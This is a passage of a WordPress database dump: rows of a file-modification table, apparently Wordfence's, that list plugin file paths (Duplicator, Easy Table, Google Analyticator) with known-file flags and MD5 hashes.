(0x04ceb048c3fce530ae1155ac26836085, 'wp-content/plugins/duplicator/installer/build/assets/inc.libs.css.php', 1, 0x00000000000000000000000000000000, 0xe63d3391f651a33e0f178bcfea797f7e),
(0x53e81a75a81cd3b0cd879a9e038751e1, 'wp-content/plugins/duplicator/installer/build/assets/inc.libs.js.php', 1, 0x00000000000000000000000000000000, 0xc2687bd96dfb170baa413d01943933eb),
(0x6aa0a5f722d785b4e5dcaa64699e1252, 'wp-content/plugins/duplicator/installer/build/classes/class.config.php', 1, 0x00000000000000000000000000000000, 0xe2a76ffa020434cca8b4fe7ec5b8b5ff),
(0xad11067a20cb8e3a42cc7e85f8d1e3a5, 'wp-content/plugins/duplicator/installer/build/classes/class.logging.php', 1, 0x00000000000000000000000000000000, 0x170d1ea5215e478ced24faf2da49e136),
(0x46596e92417a00fb9a10f61ccc3e514d, 'wp-content/plugins/duplicator/installer/build/classes/class.serializer.php', 1, 0x00000000000000000000000000000000, 0x31b928ac3672297fab3d70b1f0a3b8dc),
(0xea254e7b0e6b50fc52c8674930aa6c0d, 'wp-content/plugins/duplicator/installer/build/classes/class.utils.php', 1, 0x00000000000000000000000000000000, 0xc3b75b35faa7f41e21bcc8c5ceb20d38),
(0x61263fd541d407dbf5cfe2a8d6287e28, 'wp-content/plugins/duplicator/installer/build/main.installer.php', 1, 0x00000000000000000000000000000000, 0x99bea24c6df5dd1a3fa120b7be10a86f),
(0x35d2f132815bd24a38eeeaea7637bfd3, 'wp-content/plugins/duplicator/installer/build/view.help.php', 1, 0x00000000000000000000000000000000, 0x75b347bd773e9e7624619202bbd88f9a),
(0xd1f22a1ae5f14362d1b828eb96033345, 'wp-content/plugins/duplicator/installer/build/view.step0.php', 1, 0x00000000000000000000000000000000, 0x24e7fc565cd182e2496cecba3fbd5634),
(0xeed7986ea060550e4dd2b5a5d0ded8db, 'wp-content/plugins/duplicator/installer/build/view.step1.php', 1, 0x00000000000000000000000000000000, 0xaa5a2a8863b82aaaca39ef52623f64d2),
(0x49ea4b3b48853a808c9d2e82116fc221, 'wp-content/plugins/duplicator/installer/build/view.step2.php', 1, 0x00000000000000000000000000000000, 0x6317a32e3200e4f8f93805c9e0b9994b),
(0x5b2303f12e763a1d15e43c86250c540f, 'wp-content/plugins/duplicator/installer/build/view.step3.php', 1, 0x00000000000000000000000000000000, 0xc1fd4180864b7a467a8365f9e96b8a0e),
(0x2309aebd16eaa33997f82487ddb80417, 'wp-content/plugins/duplicator/installer/dtoken.php', 1, 0x00000000000000000000000000000000, 0xc6ae56de1c7b1269fba8ca589f7e9548),
(0xcbadbcea14c087617941f96eed6db49a, 'wp-content/plugins/duplicator/lang/wpduplicator-de_DE.mo', 1, 0x00000000000000000000000000000000, 0xb6711fcf98a22b1faa96fac57f0de992),
(0x8c2d63a3ad0e33ef799c4ce7d2ed80cd, 'wp-content/plugins/duplicator/lang/wpduplicator-de_DE.po', 1, 0x00000000000000000000000000000000, 0x21ca48b44805f1863fe933fd84702c59),
(0xab8380a2c255a1153c0fea353a297282, 'wp-content/plugins/duplicator/lang/wpduplicator-fr_FR.mo', 1, 0x00000000000000000000000000000000, 0xfc58bb2b0b1e8d81b83336694c06d870),
(0x2644b2b71fb236a6bab99a92e0b3e050, 'wp-content/plugins/duplicator/lang/wpduplicator-fr_FR.po', 1, 0x00000000000000000000000000000000, 0xf8ed8841361b76d5cab8d95976021d6f),
(0xcee50ec2ddf114321ec778da5914ad23, 'wp-content/plugins/duplicator/lang/wpduplicator.mo', 1, 0x00000000000000000000000000000000, 0x6ba6530918837ff2ce33d89bec38bd46),
(0xdf08f787d7d3f80c3974371374442559, 'wp-content/plugins/duplicator/lang/wpduplicator.po', 1, 0x00000000000000000000000000000000, 0x33d430c865c811a7aebd5e4a1b522ce2),
(0x75d74d09aa1a18a6ebcc442161512cc4, 'wp-content/plugins/duplicator/lang/wpduplicator.pot', 1, 0x00000000000000000000000000000000, 0x29712e96930d08e887ac1924858fffce),
(0x1b4c2795e4235451ad9a511dcc7ed7f3, 'wp-content/plugins/duplicator/readme.txt', 1, 0x00000000000000000000000000000000, 0x5f4fec61b39746ccb5cb0d8c8f8a80a5),
(0xf207dd1930e8a93149724246b848c532, 'wp-content/plugins/duplicator/uninstall.php', 1, 0x00000000000000000000000000000000, 0x97ccd900ce778e5229b41b9d1bb2eb64),
(0xa92b0180f2e084a0af18c9864957857b, 'wp-content/plugins/duplicator/views/actions.php', 1, 0x00000000000000000000000000000000, 0x0d9c7582e465f1596122118d34d5acc6),
(0x029fc39a359904c7b844c3ff9e81e9f5, 'wp-content/plugins/duplicator/views/help/about.php', 1, 0x00000000000000000000000000000000, 0x5125a942321223c7101e8907486329e6);
INSERT INTO `wp_wfFileMods` (`filenameMD5`, `filename`, `knownFile`, `oldMD5`, `newMD5`) VALUES
(0x437a063076fc713572bb2ae82de3a8e1, 'wp-content/plugins/duplicator/views/help/gopro.php', 1, 0x00000000000000000000000000000000, 0xb5b53a21fef63675f5895a3b6d4f06cd),
(0xdb99fa13a2b2e2ccb140a3c65e31c04c, 'wp-content/plugins/duplicator/views/help/help.php', 1, 0x00000000000000000000000000000000, 0x96dc1d9445c9a05c1fd7b73289927ae2),
(0x27bcfb48e94204c32f9f2c7cac6918bf, 'wp-content/plugins/duplicator/views/inc.header.php', 1, 0x00000000000000000000000000000000, 0xd2a55dd2b4dfa9dd14ec451c9d7abbb7),
(0xd04ce0f2ebb8fbae441d35320f8b5fb1, 'wp-content/plugins/duplicator/views/javascript.php', 1, 0x00000000000000000000000000000000, 0xd16e7f2c87a8346a7faccf6a5b6aec18),
(0x8eea4c659506245468e8599faadc9fcc, 'wp-content/plugins/duplicator/views/packages/controller.php', 1, 0x00000000000000000000000000000000, 0xd3eec7f8811dd237863130f77521a2a8),
(0x39b0c143ce03a6a7083f00ef7d51b0d2, 'wp-content/plugins/duplicator/views/packages/list-nodata.php', 1, 0x00000000000000000000000000000000, 0x429d03d46254b5b70ea75f6f43e4b552),
(0xf4012bcd2cf1c3f09bfdb58ae7cf00a3, 'wp-content/plugins/duplicator/views/packages/list.base.php', 1, 0x00000000000000000000000000000000, 0x67f09cc672bdc836768b0001f9b3bd64),
(0x03a85ba4185d8021828ff5b0aed059f4, 'wp-content/plugins/duplicator/views/packages/new1.base.php', 1, 0x00000000000000000000000000000000, 0x1c151a686c70190d64390987257259a4),
(0x13c4f277c12f4043ed2a62add6bc978f, 'wp-content/plugins/duplicator/views/packages/new1.inc.form.php', 1, 0x00000000000000000000000000000000, 0x75f662f420883b5b93d8358913aec360),
(0x119949b379eafa5ec182728b38de630e, 'wp-content/plugins/duplicator/views/packages/new2.base.php', 1, 0x00000000000000000000000000000000, 0xdce43b270d12c4b80abbc175fcf78823),
(0xcb2dd9cc5e5d707719119e18d4ec77c1, 'wp-content/plugins/duplicator/views/packages/new3.base.php', 1, 0x00000000000000000000000000000000, 0x96829edc5bd3697084dc2c9ee19a25c9),
(0xa2686aacef811ecc9fd88201708275e8, 'wp-content/plugins/duplicator/views/settings/controller.php', 1, 0x00000000000000000000000000000000, 0x234b75d07151e897c261a3bbe7102653),
(0x1e9d3abfb971d7c6428306f712eee27f, 'wp-content/plugins/duplicator/views/settings/general.php', 1, 0x00000000000000000000000000000000, 0x97a07b6936786f86335b1c2021d5e835),
(0x89f5c9da9dcd1f0926ef28ffa42157f7, 'wp-content/plugins/duplicator/views/tools/cleanup.php', 1, 0x00000000000000000000000000000000, 0x39ecc57553d242f82afc5145809e1ec9),
(0x778bd91d43b8874fca78b7df239b296e, 'wp-content/plugins/duplicator/views/tools/controller.php', 1, 0x00000000000000000000000000000000, 0xf611aead97d7ef35243bcaaeb3953fce),
(0x9ade2c92282b84d81c51e139a9720896, 'wp-content/plugins/duplicator/views/tools/diagnostics.php', 1, 0x00000000000000000000000000000000, 0x431c5d392622053262db2e7697c24977),
(0x1081236552d0e6c77e5b19f9e2ce0929, 'wp-content/plugins/duplicator/views/tools/logging.php', 1, 0x00000000000000000000000000000000, 0xd15f2686a58c17b09f55f6b80b31a706),
(0xedd48be8609cb2f1f850727e1846c5f8, 'wp-content/plugins/easy-table/css/admin-style.css', 1, 0x00000000000000000000000000000000, 0x8d9bd715d1cd769df8177819dcdbacf4),
(0x2b2cb2bc8f5547d6db862cbd49e00814, 'wp-content/plugins/easy-table/css/easy-table.css', 1, 0x00000000000000000000000000000000, 0x64fc0627bb8adaaf418079c094b239c5),
(0x80e526380f239f38948124ea507326f4, 'wp-content/plugins/easy-table/css/index.html', 1, 0x00000000000000000000000000000000, 0xd41d8cd98f00b204e9800998ecf8427e),
(0x2c894e879bf1456b975262f4cddcfc15, 'wp-content/plugins/easy-table/easy-table.php', 1, 0x00000000000000000000000000000000, 0xee03e38edcbf9d1123dd04bb79971151),
(0x2524b9a560cb24d3837d5ce709cb7557, 'wp-content/plugins/easy-table/images/asc.gif', 1, 0x00000000000000000000000000000000, 0xf8a1940c9cf44ab8870319169f3a14ff),
(0xbcf0e7d429faf932d7b56035c1fb6756, 'wp-content/plugins/easy-table/images/bg.gif', 1, 0x00000000000000000000000000000000, 0xc01ad2e7c59d1a20a433cb873c21bd88),
(0xd42c9a3bbab56d44d534d0c3117e8af6, 'wp-content/plugins/easy-table/images/desc.gif', 1, 0x00000000000000000000000000000000, 0xa54846803de3cc786eec3d69f9ac2d38),
(0x0c12fc5eaf2a3fb747a5506f4bfae2f5, 'wp-content/plugins/easy-table/images/icon-table.png', 1, 0x00000000000000000000000000000000, 0x7bb65f5c51b27e8a14b9eb5b6318a53d),
(0x2e85d6bd4133a58f363d4e8ed86d0187, 'wp-content/plugins/easy-table/images/index.html', 1, 0x00000000000000000000000000000000, 0xd41d8cd98f00b204e9800998ecf8427e),
(0x6a0484d89090da3952906f82b445caf1, 'wp-content/plugins/easy-table/inc/Encoding.php', 1, 0x00000000000000000000000000000000, 0xf4ab5e5312b93afd6d14ed7ca5e14992),
(0xe54dfa8fd95cf2907901cdddac7d9b4f, 'wp-content/plugins/easy-table/inc/index.html', 1, 0x00000000000000000000000000000000, 0xd41d8cd98f00b204e9800998ecf8427e),
(0x79e4ea24a8848289faca930b7b0e2c9d, 'wp-content/plugins/easy-table/index.html', 1, 0x00000000000000000000000000000000, 0xd41d8cd98f00b204e9800998ecf8427e),
(0x8f12ce5707e042cb5e2adcc066e8c315, 'wp-content/plugins/easy-table/js/easy-table-script.js', 1, 0x00000000000000000000000000000000, 0xc1b7eef641c5b2057d4d686cff1999be),
(0xb70d35b3a5426448212277c003846bf7, 'wp-content/plugins/easy-table/js/index.html', 1, 0x00000000000000000000000000000000, 0xd41d8cd98f00b204e9800998ecf8427e),
(0x9dcb4a90dd6b6e10fc914acafcae30c0, 'wp-content/plugins/easy-table/js/ttooltip/script/index.html', 1, 0x00000000000000000000000000000000, 0xd41d8cd98f00b204e9800998ecf8427e),
(0x1fc84564481775a0d8bf14cc413943f4, 'wp-content/plugins/easy-table/js/ttooltip/script/jquery-ttooltip.js', 1, 0x00000000000000000000000000000000, 0xc09a89c66f1971107445b0b5cbc378c0),
(0x04848049e3df60dff32767e2adf0c0c5, 'wp-content/plugins/easy-table/js/ttooltip/script/jquery-ttooltip.min.js', 1, 0x00000000000000000000000000000000, 0x6d398b08d03f0430625f8f8dd6de854c),
(0x87e00f5c37fd71fa9b275b88e206604f, 'wp-content/plugins/easy-table/js/ttooltip/style/index.html', 1, 0x00000000000000000000000000000000, 0xd41d8cd98f00b204e9800998ecf8427e),
(0x591ab33ad04ea5088dcd024521583901, 'wp-content/plugins/easy-table/js/ttooltip/style/jquery-ttooltip.css', 1, 0x00000000000000000000000000000000, 0x36d22c1adfd37887d72f013037d539df),
(0x91aa290b67eebf78389c57962628178d, 'wp-content/plugins/easy-table/languages/easy-table-id_ID.mo', 1, 0x00000000000000000000000000000000, 0xc8a14472d1ede4571eaea5698cb3d90d),
(0xc3d9426b44f0d3663f411a01ce8c0554, 'wp-content/plugins/easy-table/languages/easy-table-id_ID.po', 1, 0x00000000000000000000000000000000, 0xa39cd2fabc6e9907f984e7177b635ff4),
(0xa858d67af2998795c269982273b54e1f, 'wp-content/plugins/easy-table/languages/english.mo', 1, 0x00000000000000000000000000000000, 0x698d624d2c1f893d89343e921035fa89),
(0xc114b924e22d4452b012c4713d552b75, 'wp-content/plugins/easy-table/languages/english.po', 1, 0x00000000000000000000000000000000, 0xb3a7a8cf209b0f0d2207f075110de442),
(0xcd4bee91d4a7633bd10d302f7f1d5739, 'wp-content/plugins/easy-table/languages/index.html', 1, 0x00000000000000000000000000000000, 0xd41d8cd98f00b204e9800998ecf8427e),
(0x4086436c668668d9a9f81b48e452d73c, 'wp-content/plugins/easy-table/readme.txt', 0, 0x2a18dd644d6feeff9ccd27a886ee971a, 0x2a18dd644d6feeff9ccd27a886ee971a),
(0x3bdc3ccb38b3317905a90732b9c170a5, 'wp-content/plugins/easy-table/themes/cuscosky/style.css', 1, 0x00000000000000000000000000000000, 0x21b64d3c1a06e9af500f0560cfba7115),
(0xa40860e54064a89de23d81837ea06a24, 'wp-content/plugins/easy-table/themes/default/style.css', 1, 0x00000000000000000000000000000000, 0xb01bdc80d67c5a80663cfeab7a15b3ab),
(0xe555a3049f932a700f9c4717661b7dfe, 'wp-content/plugins/easy-table/themes/index.html', 1, 0x00000000000000000000000000000000, 0xd41d8cd98f00b204e9800998ecf8427e),
(0x28b6418ac054ca9dd2c3e1ab8aa2a4b3, 'wp-content/plugins/easy-table/themes/minimal/style.css', 1, 0x00000000000000000000000000000000, 0x747ddad0d01af921d0f05caf7f4cd8cc),
(0x26dfb791d23dd60c0141c9661260659f, 'wp-content/plugins/google-analyticator/class.analytics.stats.php', 1, 0x00000000000000000000000000000000, 0x4a137ffd191a5c4a0e989c60e71a10f2),
(0x10f4cb710c30f73fff595c77237ec1ba, 'wp-content/plugins/google-analyticator/download-button.png', 1, 0x00000000000000000000000000000000, 0xe0f9a10bd807fe97bd1eabef32897695),
(0x2b4312496feda27996e980eedb4dda3c, 'wp-content/plugins/google-analyticator/external-tracking.js', 1, 0x00000000000000000000000000000000, 0x94b8fd063d5ea00de45d7a5a8da26570),
(0xd6dc5e43648fe300486fc51322e0d9e9, 'wp-content/plugins/google-analyticator/external-tracking.min.js', 1, 0x00000000000000000000000000000000, 0x7e1385d5819f26c37f29f33a8eccc7e2),
(0x19d809f425ffd8ee957bca09a92de655, 'wp-content/plugins/google-analyticator/ga-md-ad-532.png', 1, 0x00000000000000000000000000000000, 0x0cbd5872997b9717540af59b36650cee),
(0xc6611689a04c3726a9bb702014e1877f, 'wp-content/plugins/google-analyticator/ga-plugin-advert-sidebar.png', 1, 0x00000000000000000000000000000000, 0x441cc3ef40408081730b926dba39a537),
(0x412fa77bae13782de2bd84bce3e07151, 'wp-content/plugins/google-analyticator/ga-plugin-advert.jpg', 1, 0x00000000000000000000000000000000, 0xab5dc5f5191b6651571cfb4f6f70a004),
(0x6263eb076b8302d1ab6317ab4a1e7a3a, 'wp-content/plugins/google-analyticator/ga_logo.png', 1, 0x00000000000000000000000000000000, 0x1fab927cfeed244580a18c736836ecd6),
(0x853d34d4cc2a7e76b6b1a5e486169572, 'wp-content/plugins/google-analyticator/gapro-plugin-advert-sidebar.png', 1, 0x00000000000000000000000000000000, 0xa11f0fd10757e4c941918bc4ceba3dfb),
(0xc6a2e89f0bfc63ecd32fd0111729af0a, 'wp-content/plugins/google-analyticator/google-analyticator.php', 1, 0x00000000000000000000000000000000, 0xb6a100af8c8382161f1e989006a2657f),
(0xbcb7755f7c86c8e821ef594c3db81261, 'wp-content/plugins/google-analyticator/google-analytics-stats-widget.php', 1, 0x00000000000000000000000000000000, 0x60abf55ead0276c7765d7c0ad5db8aac),
(0xb503c77a4c28010a6c26409d31ca1999, 'wp-content/plugins/google-analyticator/google-analytics-summary-widget.php', 1, 0x00000000000000000000000000000000, 0x17bdaa2445ffb85f29618b906c2d0635),
(0xf216bd80a6fab522150ecadda47b543f, 'wp-content/plugins/google-analyticator/google-api-php-client/src/Google_Client.php', 0, 0x7b85279df4c0d845415c97a579df614e, 0x7b85279df4c0d845415c97a579df614e),
(0x3bdd83b2f6cbd00358a5f72df0fa9e18, 'wp-content/plugins/google-analyticator/google-api-php-client/src/auth/Google_AssertionCredentials.php', 0, 0x19ec1a0bc3ffdeb07083e225f3e0ac7b, 0x19ec1a0bc3ffdeb07083e225f3e0ac7b),
(0x2a22e7cdf3c2ae5c070457b33b09f2d4, 'wp-content/plugins/google-analyticator/google-api-php-client/src/auth/Google_Auth.php', 0, 0x15873dc9c390eadbd5da2c0297062d7c, 0x15873dc9c390eadbd5da2c0297062d7c),
(0xc424559d985dd63e49b0d6ec5ee44b03, 'wp-content/plugins/google-analyticator/google-api-php-client/src/auth/Google_AuthNone.php', 0, 0x093b237c59e2e085a97e664c0ce88ebe, 0x093b237c59e2e085a97e664c0ce88ebe),
(0x24abdd7261727ed7c9d97d4a583796a8, 'wp-content/plugins/google-analyticator/google-api-php-client/src/auth/Google_LoginTicket.php', 0, 0x4397ba773564c0c73f32ae118c24b5d2, 0x4397ba773564c0c73f32ae118c24b5d2),
(0xdd9f2308f142f83ab0df9162d2f32eb1, 'wp-content/plugins/google-analyticator/google-api-php-client/src/auth/Google_OAuth2.php', 0, 0x39f54796674f476271ce8d5c05c9ec71, 0x39f54796674f476271ce8d5c05c9ec71),
(0xfddb5fe9d20c25de1293388a597c7481, 'wp-content/plugins/google-analyticator/google-api-php-client/src/auth/Google_P12Signer.php', 0, 0xe33e570503ed42cf7d25dd6c32d67263, 0xe33e570503ed42cf7d25dd6c32d67263),
(0xadf066e3219bacc3abd3c942b9bb3234, 'wp-content/plugins/google-analyticator/google-api-php-client/src/auth/Google_PemVerifier.php', 0, 0xe9fb745bc98981953a270e0374e77e58, 0xe9fb745bc98981953a270e0374e77e58),
(0x02405c5f9fae57a3195aa9c03de78390, 'wp-content/plugins/google-analyticator/google-api-php-client/src/auth/Google_Signer.php', 0, 0xb89eb963b836860aa622c2111915e5ac, 0xb89eb963b836860aa622c2111915e5ac),
(0x8476e00e618be847e0923fecc2b46ff9, 'wp-content/plugins/google-analyticator/google-api-php-client/src/auth/Google_Verifier.php', 0, 0x08c9de305f4824c6d94d7c40bfe7be58, 0x08c9de305f4824c6d94d7c40bfe7be58),
(0x57fadf6290a92eee7f6e6860e44e1554, 'wp-content/plugins/google-analyticator/google-api-php-client/src/cache/Google_ApcCache.php', 0, 0x38942168cb94c15a9064aa8faa6c1817, 0x38942168cb94c15a9064aa8faa6c1817),
(0xd2389f0d3e2111f08ef2614c663d3536, 'wp-content/plugins/google-analyticator/google-api-php-client/src/cache/Google_Cache.php', 0, 0x98c92b5d919c9143e68230e612298a9b, 0x98c92b5d919c9143e68230e612298a9b),
(0x1c218a7afd6b496d5343babc975680b2, 'wp-content/plugins/google-analyticator/google-api-php-client/src/cache/Google_FileCache.php', 0, 0x7cb3f047c1e3774474de8e8b2f5bd638, 0x7cb3f047c1e3774474de8e8b2f5bd638),
(0x14aeb8cf484daf99aa5240859405ba74, 'wp-content/plugins/google-analyticator/google-api-php-client/src/cache/Google_MemcacheCache.php', 0, 0x48f2b20eb2481b40954d0a7a130fa766, 0x48f2b20eb2481b40954d0a7a130fa766),
(0x7399f7303b86a66c24942008b12c587e, 'wp-content/plugins/google-analyticator/google-api-php-client/src/config.php', 0, 0x036fcb86e5358565d2844620fe9ba4b1, 0x036fcb86e5358565d2844620fe9ba4b1),
(0x8c2680ec3b5069145b8e44026376a0dd, 'wp-content/plugins/google-analyticator/google-api-php-client/src/contrib/Google_AdexchangebuyerService.php', 0, 0xfcd6af83603120d00412c315fec93186, 0xfcd6af83603120d00412c315fec93186),
(0xbf289572f6fbe4cf06f7cd7814e69d3e, 'wp-content/plugins/google-analyticator/google-api-php-client/src/contrib/Google_AdsenseService.php', 0, 0x46a03ecf85100740f30d284a07eb54eb, 0x46a03ecf85100740f30d284a07eb54eb),
(0xebcc0aafa7fbaf30376ed13fed9420c2, 'wp-content/plugins/google-analyticator/google-api-php-client/src/contrib/Google_AdsensehostService.php', 0, 0x8b6a5cd3244cf84c6b33e111570d0d7f, 0x8b6a5cd3244cf84c6b33e111570d0d7f),
(0x46adee3894b1e87f27fc3a55c6370a97, 'wp-content/plugins/google-analyticator/google-api-php-client/src/contrib/Google_AnalyticsService.php', 0, 0xebac87fabc96f512e2fde8b8514aec71, 0xebac87fabc96f512e2fde8b8514aec71),
(0x4ef568aefdc764b96da5f48819852a8b, 'wp-content/plugins/google-analyticator/google-api-php-client/src/contrib/Google_BigqueryService.php', 0, 0x52cdc203a5959b43c6a8a69b9cb16f45, 0x52cdc203a5959b43c6a8a69b9cb16f45),
(0x00f463d910b11afac8f3d5cf08d6a090, 'wp-content/plugins/google-analyticator/google-api-php-client/src/contrib/Google_BloggerService.php', 0, 0x65336d21d58f8f2c983246b2a768064c, 0x65336d21d58f8f2c983246b2a768064c),
(0xa994fca6909aa9bfed45735e02fb88e2, 'wp-content/plugins/google-analyticator/google-api-php-client/src/contrib/Google_BooksService.php', 0, 0x1d3ea79436b063f95f1b1995217ff105, 0x1d3ea79436b063f95f1b1995217ff105),
(0x25fde56fd249a349d32e3128420291ec, 'wp-content/plugins/google-analyticator/google-api-php-client/src/contrib/Google_CalendarService.php', 0, 0x1828cfdabcded687997e5cad9999b4bb, 0x1828cfdabcded687997e5cad9999b4bb),
(0x40ee60cc858ebcbb22a717bf771be2a0, 'wp-content/plugins/google-analyticator/google-api-php-client/src/contrib/Google_ComputeService.php', 0, 0xfb9b77fb21dcd4b0482bff282a19d890, 0xfb9b77fb21dcd4b0482bff282a19d890),
(0x83a14192914fb556040f89499e9b6b9d, 'wp-content/plugins/google-analyticator/google-api-php-client/src/contrib/Google_CustomsearchService.php', 0, 0x71e240765a29ee901ad1f5f30a7164e6, 0x71e240765a29ee901ad1f5f30a7164e6),
(0xbe53a959715b32f19b39063f5378ea3b, 'wp-content/plugins/google-analyticator/google-api-php-client/src/contrib/Google_DriveService.php', 0, 0x49689e610b50e54ffb37fc09bb7bcf31, 0x49689e610b50e54ffb37fc09bb7bcf31),
(0xfce830dfa2137e3892056f17045895b1, 'wp-content/plugins/google-analyticator/google-api-php-client/src/contrib/Google_FreebaseService.php', 0, 0xeb53801d59a2edd1c16e5c5b33fba221, 0xeb53801d59a2edd1c16e5c5b33fba221),
(0xddee22daf87b55370457412a33b83521, 'wp-content/plugins/google-analyticator/google-api-php-client/src/contrib/Google_FusiontablesService.php', 0, 0x2e484e55d79e219246a7ef8f56dfd5ee, 0x2e484e55d79e219246a7ef8f56dfd5ee),
(0xd6113ebed759e9932a1e81ecb33ff923, 'wp-content/plugins/google-analyticator/google-api-php-client/src/contrib/Google_GanService.php', 0, 0x78df9910ea63e74f3225678f364712d9, 0x78df9910ea63e74f3225678f364712d9),
(0x58e160c58f0a4b532f1182e373882d97, 'wp-content/plugins/google-analyticator/google-api-php-client/src/contrib/Google_LatitudeService.php', 0, 0x165096ab7a3a8b05f97ea3a3f02d28d6, 0x165096ab7a3a8b05f97ea3a3f02d28d6),
(0x4beae045af3422481f73c70a6815e164, 'wp-content/plugins/google-analyticator/google-api-php-client/src/contrib/Google_LicensingService.php', 0, 0x8f55c323fb03447bab1b7403fd4ab2f6, 0x8f55c323fb03447bab1b7403fd4ab2f6),
(0x17b2decda396068cebbd84a83c87537b, 'wp-content/plugins/google-analyticator/google-api-php-client/src/contrib/Google_ModeratorService.php', 0, 0xf20f92b05539441192ccf98ef0d6cc90, 0xf20f92b05539441192ccf98ef0d6cc90),
(0xc3040c5cd47cfae1c1e80881e9325829, 'wp-content/plugins/google-analyticator/google-api-php-client/src/contrib/Google_Oauth2Service.php', 0, 0x9273a2ae188738ccd091017212495197, 0x9273a2ae188738ccd091017212495197),
(0x220c0e32341baa0e9fb8d5a2b4f6fbe9, 'wp-content/plugins/google-analyticator/google-api-php-client/src/contrib/Google_OrkutService.php', 0, 0xd0cd466c78cd9c8dcd1e0cfef384696b, 0xd0cd466c78cd9c8dcd1e0cfef384696b),
(0x4f8aab7f6423a2bef6240fa205bd6851, 'wp-content/plugins/google-analyticator/google-api-php-client/src/contrib/Google_PagespeedonlineService.php', 0, 0xb73efb6889f190c4aeb01758f8cfc43a, 0xb73efb6889f190c4aeb01758f8cfc43a),
(0x02b26d84b769292e94b86919538331b0, 'wp-content/plugins/google-analyticator/google-api-php-client/src/contrib/Google_PlusMomentsService.php', 0, 0xa4455c8ef47558346a85d2e47588146a, 0xa4455c8ef47558346a85d2e47588146a),
(0xe891a1b1f768a812aaa3c316ddf99cb3, 'wp-content/plugins/google-analyticator/google-api-php-client/src/contrib/Google_PlusService.php', 0, 0xc7853657af310fa339f9aa70ff056b00, 0xc7853657af310fa339f9aa70ff056b00),
(0xf1700ca02fdea41bc8296faefbed183a, 'wp-content/plugins/google-analyticator/google-api-php-client/src/contrib/Google_PredictionService.php', 0, 0x2c4739a3ef181178eb4f76f9ab2d56f6, 0x2c4739a3ef181178eb4f76f9ab2d56f6),
(0x3a7e034a6e1d24822de244d3c1b50deb, 'wp-content/plugins/google-analyticator/google-api-php-client/src/contrib/Google_ShoppingService.php', 0, 0x3dbda05eb3f7f8baa7f0188a0a391eac, 0x3dbda05eb3f7f8baa7f0188a0a391eac),
(0x7e58fabaf2307b501440b45d9ebb9d98, 'wp-content/plugins/google-analyticator/google-api-php-client/src/contrib/Google_SiteVerificationService.php', 0, 0x9792e2bbe628fdae91dbfae35c00df14, 0x9792e2bbe628fdae91dbfae35c00df14),
(0x6124ef5cdbc9db8a9fa13e4b8964ba90, 'wp-content/plugins/google-analyticator/google-api-php-client/src/contrib/Google_StorageService.php', 0, 0x51b240f63170d0c0dd27a2c6e435ddbe, 0x51b240f63170d0c0dd27a2c6e435ddbe),
(0x1ea2bdb3c5a6bff961658b1528a6ba02, 'wp-content/plugins/google-analyticator/google-api-php-client/src/contrib/Google_TaskqueueService.php', 0, 0xe34f538ffc1e2e412431e85c7cdec662, 0xe34f538ffc1e2e412431e85c7cdec662),
(0xcadbb6946854c2d35c723ece044cda22, 'wp-content/plugins/google-analyticator/google-api-php-client/src/contrib/Google_TasksService.php', 0, 0x3065ef4ba7b95317e149191432cb8440, 0x3065ef4ba7b95317e149191432cb8440),
(0x666faf3c354d484d9777b88e97fdf50f, 'wp-content/plugins/google-analyticator/google-api-php-client/src/contrib/Google_TranslateService.php', 0, 0x5dc38b483a051aab0ded6c327beb0025, 0x5dc38b483a051aab0ded6c327beb0025),
(0x5d59218ffca69c9e5747a76416a3781e, 'wp-content/plugins/google-analyticator/google-api-php-client/src/contrib/Google_UrlshortenerService.php', 0, 0xef4fe776c3fa2324dde4afbe0494f979, 0xef4fe776c3fa2324dde4afbe0494f979),
(0xf9e3735f96524f694e44f004e5c39ef9, 'wp-content/plugins/google-analyticator/google-api-php-client/src/contrib/Google_WebfontsService.php', 0, 0x04260525d97d2a1701821eced43fd96e, 0x04260525d97d2a1701821eced43fd96e),
(0x1e9a13b756c41b38c001c4dec0b37c6c, 'wp-content/plugins/google-analyticator/google-api-php-client/src/contrib/Google_YoutubeService.php', 0, 0x61d96013596c3d94a3388682fb085e29, 0x61d96013596c3d94a3388682fb085e29),
(0x7922aa6d77f226bbd2028560f1f2ddbd, 'wp-content/plugins/google-analyticator/google-api-php-client/src/external/URITemplateParser.php', 0, 0xab16c229beb014fd4a99e5c095ef6ac7, 0xab16c229beb014fd4a99e5c095ef6ac7),
(0xf1986a8e6b05e6ea520a4f9ba68210cb, 'wp-content/plugins/google-analyticator/google-api-php-client/src/io/Google_CacheParser.php', 0, 0xa8524de4f95bc1d237a7bf22dd3dfb8a, 0xa8524de4f95bc1d237a7bf22dd3dfb8a),
(0x20c369d949cb16fe2746b374c83e0dbd, 'wp-content/plugins/google-analyticator/google-api-php-client/src/io/Google_CurlIO.php', 0, 0x9f5d2871c87ba61cced0efab8c57d4dc, 0x9f5d2871c87ba61cced0efab8c57d4dc),
(0xd087464761fb82ce621c19c63c94d8f2, 'wp-content/plugins/google-analyticator/google-api-php-client/src/io/Google_HttpRequest.php', 0, 0x01f22c8d762d21fd7c93d4d60737b041, 0x01f22c8d762d21fd7c93d4d60737b041),
(0xac4095e53b720d374605d0557e239a33, 'wp-content/plugins/google-analyticator/google-api-php-client/src/io/Google_IO.php', 0, 0x872ddfd60a5ef638517ef81c7c0b6b95, 0x872ddfd60a5ef638517ef81c7c0b6b95),
(0x0b71d23d2a5b6fc15e916f8f18ed9a50, 'wp-content/plugins/google-analyticator/google-api-php-client/src/io/Google_REST.php', 0, 0xe0b7abd2292576c5b087b8ddbc5c66b6, 0xe0b7abd2292576c5b087b8ddbc5c66b6),
(0xf24362270641dedc4a28971eb6ac1d30, 'wp-content/plugins/google-analyticator/google-api-php-client/src/io/cacerts.pem', 0, 0x2dc185f345f7ca634aec690243f346d8, 0x2dc185f345f7ca634aec690243f346d8),
(0xc4cb43e94afa4d55964c9a668d533f8b, 'wp-content/plugins/google-analyticator/google-api-php-client/src/local_config.php', 0, 0x50e52c5e49cd7a889b09304f2d823877, 0x50e52c5e49cd7a889b09304f2d823877),
(0xd125b85c0ed10d4952454c79a6191e8a, 'wp-content/plugins/google-analyticator/google-api-php-client/src/service/Google_BatchRequest.php', 0, 0x3c5f95b98e16d1a4a3fe2cc5cf48e9b6, 0x3c5f95b98e16d1a4a3fe2cc5cf48e9b6),
(0x721f7ff9c61c3504944cbbb70d82bfd9, 'wp-content/plugins/google-analyticator/google-api-php-client/src/service/Google_MediaFileUpload.php', 0, 0x58f7f9a71a8cbe0bc6b9a08645d22141, 0x58f7f9a71a8cbe0bc6b9a08645d22141),
